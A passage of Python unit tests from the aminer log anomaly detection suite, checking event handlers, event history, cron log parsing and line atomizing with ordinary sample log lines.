match_s2, repr(match_element.match_object)) self.stream_printer_event_handler.receive_event(test % self.__class__.__name__, new_val, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self) dt = datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S") self.assertEqual(self.output_stream.getvalue(), exp % (dt, match_s1 + ", " + match_s2, "b' pid='", self.__class__.__name__, description, 2, " pid=\n pid=\n")) self.reset_output_stream() #In this test case the EventHandler receives no lines from the test class. self.stream_printer_event_handler.receive_event(test % self.__class__.__name__, new_val, [], None, log_atom, self) self.assertEqual(self.output_stream.getvalue(), exp % (dt, match_s1 + ", " + match_s2, "b' pid='", self.__class__.__name__, description, 0, "")) self.reset_output_stream() #In this test case the EventHandler receives no logAtom from the test class and the method should raise an exception. self.assertRaises(Exception, self.stream_printer_event_handler.receive_event, test % self.__class__.__name__, new_val, [log_atom.raw_data, log_atom.raw_data], log_atom.get_parser_match(), self) # test output_event_handlers self.output_event_handlers = [] self.assertTrue(self.stream_printer_event_handler.receive_event(test % self.__class__.__name__, new_val, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)) self.assertEqual(self.output_stream.getvalue(), "") self.output_event_handlers = [self.stream_printer_event_handler] self.assertTrue(self.stream_printer_event_handler.receive_event(test % self.__class__.__name__, new_val, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)) self.assertEqual(self.output_stream.getvalue(), exp % (dt, match_s1 + ", " + match_s2, "b' pid='", self.__class__.__name__, description, 2, " pid=\n pid=\n")) self.reset_output_stream() # test suppress detector list self.output_event_handlers = None self.analysis_context.suppress_detector_list = [description] self.assertTrue(self.stream_printer_event_handler.receive_event(test % self.__class__.__name__, new_val, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)) self.assertEqual(self.output_stream.getvalue(), "") self.output_event_handlers = [self.stream_printer_event_handler] self.analysis_context.suppress_detector_list = [] self.assertTrue(self.stream_printer_event_handler.receive_event(test % self.__class__.__name__, new_val, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)) self.assertEqual(self.output_stream.getvalue(), exp % (dt, match_s1 + ", " + match_s2, "b' pid='", self.__class__.__name__, description, 2, " pid=\n pid=\n")) def test2validate_parameters(self): """Test all initialization parameters for the event handler. Input parameters must be validated in the class.""" self.assertRaises(TypeError, StreamPrinterEventHandler, self.analysis_context, "") self.assertRaises(TypeError, StreamPrinterEventHandler, self.analysis_context, b"") self.assertRaises(TypeError, StreamPrinterEventHandler, self.analysis_context, ["default"]) self.assertRaises(TypeError, StreamPrinterEventHandler, self.analysis_context, None) self.assertRaises(TypeError, StreamPrinterEventHandler, self.analysis_context, True) self.assertRaises(TypeError, StreamPrinterEventHandler, self.analysis_context, 123) self.assertRaises(TypeError, StreamPrinterEventHandler, self.analysis_context, 123.3) self.assertRaises(TypeError, StreamPrinterEventHandler, self.analysis_context, {"id": "Default"}) self.assertRaises(TypeError, StreamPrinterEventHandler, self.analysis_context, ()) self.assertRaises(TypeError, StreamPrinterEventHandler, self.analysis_context, set()) StreamPrinterEventHandler(self.analysis_context, sys.stdout) StreamPrinterEventHandler(self.analysis_context, sys.stderr) StreamPrinterEventHandler(self.analysis_context, self.output_stream) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/events/SyslogWriterEventHandlerTest.py000066400000000000000000000125211500476301700314540ustar00rootroot00000000000000import unittest import os from datetime import datetime from time import time, sleep from aminer.events.SyslogWriterEventHandler import SyslogWriterEventHandler from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyMatchContext class SyslogWriterEventHandlerTest(TestBase): """Some of the test cases may fail if the same numbers as the PID are found in the syslog. Rerun the unit, when this happens.""" def test1receive_event(self): """In this test case the EventHandler receives multiple lines from the test class.""" description = "Test1SyslogWriterEventHandler" pid = b" pid=" test = "Test.%s" % self.__class__.__name__ match_context = DummyMatchContext(pid) fdme = DummyFixedDataModelElement("s1", pid) match_element = fdme.get_match_element("match", match_context) new_val = "New value for paths match/s1, match/s2: b' pid='" t = time() dtm = datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S") exp1 = '[0] %s %s\n[0-1] %s: "%s" (%d lines)\n[0-2] pid=\n[0-3] pid=\n' % (dtm, new_val, self.__class__.__name__, description, 2) exp2 = '[1] %s %s\n[1-1] %s: "%s" (%d lines)\n' % (dtm, new_val, self.__class__.__name__, description, 0) sweh = SyslogWriterEventHandler(self.analysis_context, "aminer") self.analysis_context.register_component(self, description) log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, self) sweh.receive_event(test, new_val, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self) string = self.extract_syslog_string() found = False string = string.split("Syslog logger initialized\n") for log in string: if exp1 in log: found = True self.assertTrue(found) # In this test case the EventHandler receives no lines from the test class. sweh.receive_event(test, new_val, [], None, log_atom, self) string = self.extract_syslog_string() found = False string = string.split("Syslog logger initialized\n") for log in string: if exp2 in log: found = True self.assertTrue(found) # In this test case the EventHandler receives no logAtom from the test class and the class should raise an exception. self.assertRaises(Exception, sweh.receive_event, test, new_val, [log_atom.raw_data, log_atom.raw_data], log_atom.get_parser_match(), self) # test output_event_handlers self.output_event_handlers = [] self.assertTrue(sweh.receive_event(test, new_val, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)) string = self.extract_syslog_string() self.assertEqual(string.count("\n"), 7) self.output_event_handlers = [sweh] self.assertTrue(sweh.receive_event(test, new_val, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)) string = self.extract_syslog_string() self.assertEqual(string.count("\n"), 11) # test suppress detector list self.output_event_handlers = None self.analysis_context.suppress_detector_list = [description] self.assertTrue(sweh.receive_event(test, new_val, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)) string = self.extract_syslog_string() self.assertEqual(string.count("\n"), 11) self.output_event_handlers = [sweh] self.analysis_context.suppress_detector_list = [] self.assertTrue(sweh.receive_event(test, new_val, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)) string = self.extract_syslog_string() self.assertEqual(string.count("\n"), 15) def extract_syslog_string(self): string = "" sleep(0.2) with open("/var/log/syslog") as search: for line in search: line = line.rstrip() # remove "\n" at end of line if "aminer[" + str(os.getpid()) + "]" in line: line = line.split("]: ") string += (line[1]) + "\n" return string def test2validate_parameters(self): """Test all initialization parameters for the event handler. Input parameters must be validated in the class.""" self.assertRaises(TypeError, SyslogWriterEventHandler, self.analysis_context, ["default"]) self.assertRaises(TypeError, SyslogWriterEventHandler, self.analysis_context, None) self.assertRaises(TypeError, SyslogWriterEventHandler, self.analysis_context, b"Default") self.assertRaises(TypeError, SyslogWriterEventHandler, self.analysis_context, True) self.assertRaises(TypeError, SyslogWriterEventHandler, self.analysis_context, 123) self.assertRaises(TypeError, SyslogWriterEventHandler, self.analysis_context, 123.3) self.assertRaises(TypeError, SyslogWriterEventHandler, self.analysis_context, {"id": "Default"}) self.assertRaises(TypeError, SyslogWriterEventHandler, self.analysis_context, ()) self.assertRaises(TypeError, SyslogWriterEventHandler, self.analysis_context, set()) self.assertRaises(ValueError, SyslogWriterEventHandler, self.analysis_context, "") SyslogWriterEventHandler(self.analysis_context, "aminer") if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/events/UtilsTest.py000066400000000000000000000155201500476301700256010ustar00rootroot00000000000000import unittest from aminer.events.Utils import VolatileLogarithmicBackoffEventHistory from time import time from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyMatchContext class UtilsTest(TestBase): """Unittests for the Utils.""" def test1receive_event(self): """Test if events are processed correctly and that edge cases are caught in exceptions.""" pid = b" pid=" test = "Test.%s" % self.__class__.__name__ message = "New value for paths match/s1, match/s2: b' pid=' " # In this test case multiple events are received by the VolatileLogarithmicBackoffEventHistory. vlbeh = VolatileLogarithmicBackoffEventHistory(10) match_context = DummyMatchContext(pid) fdme = DummyFixedDataModelElement("s1", pid) match_element = fdme.get_match_element("match", match_context) t = time() log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, self) vlbeh.receive_event(test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self) self.assertEqual(vlbeh.get_history(), [(0, test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)]) vlbeh.receive_event(test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self) self.assertEqual(vlbeh.get_history(), [(0, test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self), (1, test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)]) # In this test case no events are received by the VolatileLogarithmicBackoffEventHistory. vlbeh = VolatileLogarithmicBackoffEventHistory(10) self.assertEqual(vlbeh.get_history(), []) # In this test case the EventHandler receives no logAtom from the test class and the output should not contain the log time. vlbeh = VolatileLogarithmicBackoffEventHistory(10) t = time() log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, self) vlbeh.receive_event(test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self) self.assertEqual(vlbeh.get_history(), [(0, test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self)]) # In this test case more events than the VolatileLogarithmicBackoffEventHistory can handle are received (max items overflow). deviation = 0.05 size = 100000 msg = "%s=%f is not between %f and %f" t = time() log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, self) first = 0 second = 0 third = 0 fourth = 0 vlbeh = VolatileLogarithmicBackoffEventHistory(2) for i in range(size): vlbeh.receive_event(test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self) vlbeh.receive_event(test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self) vlbeh.receive_event(test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self) vlbeh.receive_event(test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self) vlbeh.receive_event(test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self) history = vlbeh.get_history() shift = i * 5 if history == [(0 + shift, test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self), (4 + shift, test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self)]: first += 1 elif history == [(1 + shift, test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self), ( 4 + shift, test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self)]: second += 1 elif history == [(2 + shift, test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self), ( 4 + shift, test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self)]: third += 1 elif history == [(3 + shift, test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self), ( 4 + shift, test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self)]: fourth += 1 val = 0.5 * 0.5 * 0.5 * 0.5 minimum = size * val * (1 - deviation) maximum = size * val * (1 + deviation) self.assertTrue(minimum <= first <= maximum, msg % ("first", first, minimum, maximum)) val = 0.5 * 0.5 * 0.5 minimum = size * val * (1 - deviation) maximum = size * val * (1 + deviation) self.assertTrue(minimum <= second <= maximum, msg % ("second", second, minimum, maximum)) val = 0.5 * 0.5 minimum = size * val * (1 - deviation) maximum = size * val * (1 + deviation) self.assertTrue(minimum <= third <= maximum, msg % ("third", third, minimum, maximum)) val = 0.5 minimum = size * val * (1 - deviation) maximum = size * val * (1 + deviation) self.assertTrue(minimum <= fourth <= maximum, msg % ("fourth", fourth, minimum, maximum)) def test2validate_parameters(self): """Test all initialization parameters for the event handler. Input parameters must be validated in the class.""" self.assertRaises(TypeError, VolatileLogarithmicBackoffEventHistory, "") self.assertRaises(TypeError, VolatileLogarithmicBackoffEventHistory, b"") self.assertRaises(TypeError, VolatileLogarithmicBackoffEventHistory, ["default"]) self.assertRaises(TypeError, VolatileLogarithmicBackoffEventHistory, None) self.assertRaises(TypeError, VolatileLogarithmicBackoffEventHistory, True) self.assertRaises(TypeError, VolatileLogarithmicBackoffEventHistory, 123.3) self.assertRaises(TypeError, VolatileLogarithmicBackoffEventHistory, {"id": "Default"}) self.assertRaises(TypeError, VolatileLogarithmicBackoffEventHistory, ()) self.assertRaises(TypeError, VolatileLogarithmicBackoffEventHistory, set()) self.assertRaises(ValueError, VolatileLogarithmicBackoffEventHistory, 0) self.assertRaises(ValueError, VolatileLogarithmicBackoffEventHistory, -1) VolatileLogarithmicBackoffEventHistory(1) VolatileLogarithmicBackoffEventHistory(100) VolatileLogarithmicBackoffEventHistory(1000) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/events/ZmqEventHandlerTest.py000066400000000000000000000166121500476301700275530ustar00rootroot00000000000000import time import zmq from aminer.events.JsonConverterHandler import JsonConverterHandler from aminer.events.ZmqEventHandler import ZmqEventHandler from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyMatchContext class ZmqEventHandlerTest(TestBase): """Unittests for the ZmqEventHandler.""" resource_name = b"testresource" sub_url = "tcp://localhost:5555" pub_url = "tcp://*:5555" topic = "test_topic" persistence_id = "Default" match_context = DummyMatchContext(b" pid=") fdme = DummyFixedDataModelElement("s1", b" pid=") match_element = fdme.get_match_element("", match_context) @classmethod def setUpClass(cls): """Start a ZmqConsumer.""" cls.context = zmq.Context() cls.consumer = cls.context.socket(zmq.SUB) cls.consumer.setsockopt(zmq.RCVTIMEO, 500) cls.consumer.connect(cls.sub_url) cls.consumer.setsockopt_string(zmq.SUBSCRIBE, cls.topic) @classmethod def tearDownClass(cls): """Shutdown the ZmqConsumer.""" cls.consumer.close() cls.context.destroy() def test1receive_event(self): """Test if events are processed correctly and that edge cases are caught in exceptions.""" description = "jsonConverterHandlerDescription" test_detector = "Analysis.TestDetector" event_message = "An event happened!" sorted_log_lines = ["Event happened at /path/ 5 times.", "", "", "", ""] exp = '{\n "AnalysisComponent": {\n "AnalysisComponentIdentifier": 0,\n "AnalysisComponentType": "%s",\n ' \ '"AnalysisComponentName": "%s",\n "Message": "%s",\n "PersistenceFileName": "%s",\n "AffectedParserPaths": [\n' \ ' "test/path/1",\n "test/path/2"\n ],\n "LogResource": "testresource"\n },\n "LogData": {\n ' \ '"RawLogData": [\n " pid="\n ],\n "Timestamps": [\n %s\n ],\n "DetectionTimestamp": %s,\n "LogLinesCount": 5\n }%s\n}\n' jch = JsonConverterHandler([self.stream_printer_event_handler], self.analysis_context) t = round(time.time(), 3) log_atom = LogAtom(self.fdme.data, ParserMatch(self.match_element), t, self) self.analysis_context.register_component(self, description) event_data = {"AnalysisComponent": {"AffectedParserPaths": ["test/path/1", "test/path/2"]}} jch.receive_event(test_detector, event_message, sorted_log_lines, event_data, log_atom, self) output = self.output_stream.getvalue() zeh = ZmqEventHandler(self.analysis_context, self.topic, self.pub_url) self.assertTrue(zeh.receive_event(test_detector, event_message, sorted_log_lines, output, log_atom, self)) topic = self.consumer.recv_string() self.assertEqual(self.topic, topic) val = self.consumer.recv_string() if val.endswith("\n\n"): val = val[:-1] detection_timestamp = None for line in val.split('\n'): if "DetectionTimestamp" in line: detection_timestamp = line.split(":")[1].strip(" ,") break self.assertEqual(val, exp % (self.__class__.__name__, description, event_message, self.persistence_id, round(t, 2), detection_timestamp, "")) # test output_event_handlers self.output_event_handlers = [] self.assertTrue(zeh.receive_event(test_detector, event_message, sorted_log_lines, output, log_atom, self)) self.assertRaises(zmq.error.Again, self.consumer.recv_string) self.output_event_handlers = [zeh] self.assertTrue(zeh.receive_event(test_detector, event_message, sorted_log_lines, output, log_atom, self)) topic = self.consumer.recv_string() self.assertEqual(self.topic, topic) val = self.consumer.recv_string() if val.endswith("\n\n"): val = val[:-1] detection_timestamp = None for line in val.split("\n"): if "DetectionTimestamp" in line: detection_timestamp = line.split(":")[1].strip(" ,") break self.assertEqual(val, exp % (self.__class__.__name__, description, event_message, self.persistence_id, round(t, 2), detection_timestamp, "")) # test suppress detector list self.output_event_handlers = None self.analysis_context.suppress_detector_list = [description] self.assertTrue(zeh.receive_event(test_detector, event_message, sorted_log_lines, output, log_atom, self)) self.assertRaises(zmq.error.Again, self.consumer.recv_string) self.output_event_handlers = [zeh] self.analysis_context.suppress_detector_list = [] zeh.producer.close() self.assertFalse(zeh.receive_event(test_detector, event_message, sorted_log_lines, output, log_atom, self)) zeh.context.destroy() def test2validate_parameters(self): """Test all initialization parameters for the event handler. Input parameters must be validated in the class.""" t = round(time.time(), 3) log_atom = LogAtom(self.fdme.data, ParserMatch(self.match_element), t, self) zmq_event_handler = ZmqEventHandler(self.analysis_context, self.topic, self.pub_url) self.assertFalse(zmq_event_handler.receive_event("test_detector", "event_message", ["loglines", ""], 123, log_atom, self)) zmq_event_handler.producer.close() zmq_event_handler.context.destroy() self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, ["default"], self.pub_url) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, None, self.pub_url) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, b"Default", self.pub_url) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, True, self.pub_url) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, 123, self.pub_url) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, 123.3, self.pub_url) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, {"id": "Default"}, self.pub_url) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, (), self.pub_url) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, set(), self.pub_url) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, self.topic, None) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, self.topic, True) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, self.topic, 123) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, self.topic, 123.3) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, self.topic, {"id": "Default"}) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, self.topic, ()) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, self.topic, set()) self.assertRaises(ValueError, ZmqEventHandler, self.analysis_context, self.topic, "") self.assertRaises(ValueError, ZmqEventHandler, self.analysis_context, self.topic, b"") zmq_event_handler = ZmqEventHandler(self.analysis_context, self.topic, b"tcp://*:5555") zmq_event_handler.producer.close() zmq_event_handler.context.destroy() if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/events/__init__.py000066400000000000000000000000001500476301700253630ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/generic/000077500000000000000000000000001500476301700233745ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/generic/CronParsingModelTest.py000066400000000000000000000201501500476301700300120ustar00rootroot00000000000000"""package not used. import unittest from aminer.generic import CronParsingModel from aminer.parsing.MatchContext import MatchContext from unit.TestBase import TestBase ''' These testcases are testing the CronParsingModel with the Basis Path Testing method. The Modified Condition / Decisision Coverage is also accomplished, because the conditions are all simple, which means it is tested if the path is reached. The used paths can be seen in the provided flowchart. The child elements of the CronParsingModel could be tested, but they are assumed to be working as intended, because there should be individual test cases for every parser model. ''' class CronParsingModelTest(TestBase): ''' 1 -> 2 -> 3 -> 4 -> 5 -> 6 -> 7 -> 8 ''' def test1(self): self.matchContext = MatchContext(b'CRON[25537]: (root) CMD ping 8.8.8.8') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(b'CRON[25537]: (root) CMD ping 8.8.8.8', self.cronParsingModel.getMatchElement('stdExec', self.matchContext).getMatchString()) ''' 1 -> 18 -> 33 ''' def test2(self): self.matchContext = MatchContext(b'systemd[1]: Started Daily apt download activities.') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdExec', self.matchContext)) ''' 1 -> 2 -> 19 -> 33 ''' def test3(self): self.matchContext = MatchContext(b'CRON[ 25537 ]: (root) CMD ping 8.8.8.8') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdExec', self.matchContext)) ''' 1 -> 2 -> 3 -> 20 -> 33 ''' def test4(self): self.matchContext = MatchContext(b'CRON[25537]:(root) CMD ping 8.8.8.8') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdExec', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 9 -> 13 -> 14 -> 15 -> 16 -> 17 ''' def test5(self): self.matchContext = MatchContext(b'CRON[25537]: pam_unix(cron:session): session opened for user root by (uid=0)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(b'CRON[25537]: pam_unix(cron:session): session opened for user root by (uid=0)', self.cronParsingModel.getMatchElement('stdPam', self.matchContext).getMatchString()) self.matchContext = MatchContext(b'CRON[25537]: pam_unix(cron:session): session closed for user root') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(b'CRON[25537]: pam_unix(cron:session): session closed for user root', self.cronParsingModel.getMatchElement('stdPam', self.matchContext).getMatchString()) ''' 1 -> 2 -> 3 -> 4 -> 9 -> 21 -> 33 ''' def test6(self): self.matchContext = MatchContext(b'CRON[25537]: CRON info (No MTA installed, discarding output)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 5 -> 10 -> 21 -> 33 ''' def test7(self): self.matchContext = MatchContext(b'CRON[25537]: (CRON;) info (No MTA installed, discarding output)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 5 -> 6 -> 11 -> 21 -> 33 ''' def test8(self): self.matchContext = MatchContext(b'CRON[25537]: (CRON) info (No MTA installed, discarding output)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 5 -> 6 -> 7 -> 12 -> 21 -> 33 ''' def test9(self): self.matchContext = MatchContext(b'CRON[25537]: (root) CMD ') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 9 -> 13 -> 22 -> 33 ''' def test10(self): self.matchContext = MatchContext(b'CRON[25537]: pam_unix(cron:session): session changed for user root by (uid=0)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 9 -> 13 -> 14 -> 23 -> 33 ''' def test11(self): self.matchContext = MatchContext(b'CRON[25537]: pam_unix(cron:session): session opened for root') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 9 -> 13 -> 14 -> 15 -> 24 -> 33 ''' def test12(self): self.matchContext = MatchContext(b'CRON[25537]: pam_unix(cron:session): session opened for user /usr/root') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 9 -> 13 -> 14 -> 15 -> 16 -> 25 -> 33 Should this case return a MatchElement? It could be an anomaly if a session is opened by another user than root. ''' def test13(self): self.matchContext = MatchContext(b'CRON[25537]: pam_unix(cron:session): session opened for user user by (uid=2)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 18 -> 26 -> 27 -> 28 -> 29 -> 30 -> 31 -> 32 ''' def test14(self): self.matchContext = MatchContext(b'cron[25537]: (*system*mailman) RELOAD (/var/spool/cron/mailman)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(b'cron[25537]: (*system*mailman) RELOAD (/var/spool/cron/mailman)', self.cronParsingModel.getMatchElement('low', self.matchContext).getMatchString()) ''' 1 -> 18 -> 26 -> 34 ''' def test15(self): self.matchContext = MatchContext(b'cron[ 25537 ]: (*system*mailman) RELOAD (/var/spool/cron/mailman)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('low', self.matchContext)) ''' 1 -> 18 -> 26 -> 27 -> 35 ''' def test16(self): self.matchContext = MatchContext(b'cron[25537]:(*system*mailman) RELOAD (/var/spool/cron/mailman)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('low', self.matchContext)) ''' 1 -> 18 -> 26 -> 27 -> 28 -> 36 The DelimitedDataModelElement should only return a MatchElement if at least one byte is between the start and the delimeter. ''' def test17(self): self.matchContext = MatchContext(b'cron[25537]: (*system*) RELOAD (/var/spool/cron/mailman)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('low', self.matchContext)) ''' 1 -> 18 -> 26 -> 27 -> 28 -> 29 -> 37 ''' def test18(self): self.matchContext = MatchContext(b'cron[25537]: (*system*) RELOAD /var/spool/cron/mailman') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('low', self.matchContext)) ''' 1 -> 18 -> 26 -> 27 -> 28 -> 29 -> 30 -> 38 ''' def test19(self): self.matchContext = MatchContext(b'cron[25537]: (*system*) RELOAD ()') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('low', self.matchContext)) ''' 1 -> 18 -> 26 -> 27 -> 28 -> 29 -> 30 -> 31 -> 39 ''' def test20(self): self.matchContext = MatchContext(b'cron[25537]: (*system*) RELOAD (/var/spool/cron/mailman') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('low', self.matchContext)) if __name__ == "__main__": unittest.main() """ logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/generic/__init__.py000066400000000000000000000000001500476301700254730ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/input/000077500000000000000000000000001500476301700231175ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/input/ByteStreamLineAtomizerTest.py000066400000000000000000000630611500476301700307410ustar00rootroot00000000000000import unittest from aminer.input.ByteStreamLineAtomizer import ByteStreamLineAtomizer from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from aminer.analysis import AtomFilters from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler from aminer.parsing.XmlModelElement import XmlModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement import sys from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyNumberModelElement class ByteStreamLineAtomizerTest(TestBase): """Unittests for the ByteStreamLineAtomizer.""" def test1consume_data(self): """ Test the main functionality of the ByteStreamLineAtomizer by running the consume_data method. All other methods are called by the consume_data method and are not meant to be private methods of the class. """ data = b"fixed data" overlong = "Overlong line detected (1 lines)\n fixed data\n\n" start_overlong = "Start of overlong line detected (1 lines)\n fixed data\n\n" overlong_end = "Overlong line terminated by end of stream (1 lines)\n fixed data\n\n" output = "New path(s) detected\nNewMatchPathDetector: \"None\" (1 lines)\n ['/fixed']\n\n" unparsed = "Unparsed atom received\nSimpleUnparsedAtomHandler: \"None\" (1 lines)\n no match\n\n" incomplete = "Incomplete last line (1 lines)\n fixed data\n\n" fdme = DummyFixedDataModelElement("fixed", data) nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=False, output_logline=False) atom_filter = AtomFilters.SubhandlerFilter(None) simple_unparsed_atom_handler = SimpleUnparsedAtomHandler([self.stream_printer_event_handler]) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) atom_filter.add_handler(nmpd) # line < max_line_length and log atom matches bsla = ByteStreamLineAtomizer(fdme, [], [self.stream_printer_event_handler], 65536, []) line = data + b"\n" self.assertEqual(bsla.consume_data(line, False), len(line)) self.assertIsNone(bsla.last_unconsumed_log_atom) self.assertEqual(self.output_stream.getvalue(), "") bsla = ByteStreamLineAtomizer(fdme, [atom_filter], [self.stream_printer_event_handler], 65536, []) self.assertEqual(bsla.consume_data(line, False), len(line)) self.assertEqual(self.output_stream.getvalue(), output) self.reset_output_stream() self.assertIsNone(bsla.last_unconsumed_log_atom) # line < max_line_length and no match no_match = b" no match\n" self.assertEqual(bsla.consume_data(no_match, False), len(no_match)) self.assertEqual(self.output_stream.getvalue(), unparsed) self.reset_output_stream() self.assertIsNone(bsla.last_unconsumed_log_atom) # line > max_line_length and log atom matches bsla = ByteStreamLineAtomizer(fdme, [atom_filter], [self.stream_printer_event_handler], 5, []) self.assertEqual(bsla.consume_data(line, False), len(line)) self.assertEqual(self.output_stream.getvalue(), overlong) self.assertIsNone(bsla.last_unconsumed_log_atom) self.reset_output_stream() bsla = ByteStreamLineAtomizer(fdme, [atom_filter], [self.stream_printer_event_handler], 5, []) self.assertEqual(bsla.consume_data(data, False), len(data)) self.assertEqual(self.output_stream.getvalue(), start_overlong) self.assertIsNone(bsla.last_unconsumed_log_atom) self.reset_output_stream() bsla = ByteStreamLineAtomizer(fdme, [atom_filter], [self.stream_printer_event_handler], 5, []) self.assertEqual(bsla.consume_data(data, True), len(data)) self.assertEqual(self.output_stream.getvalue(), start_overlong + overlong_end) 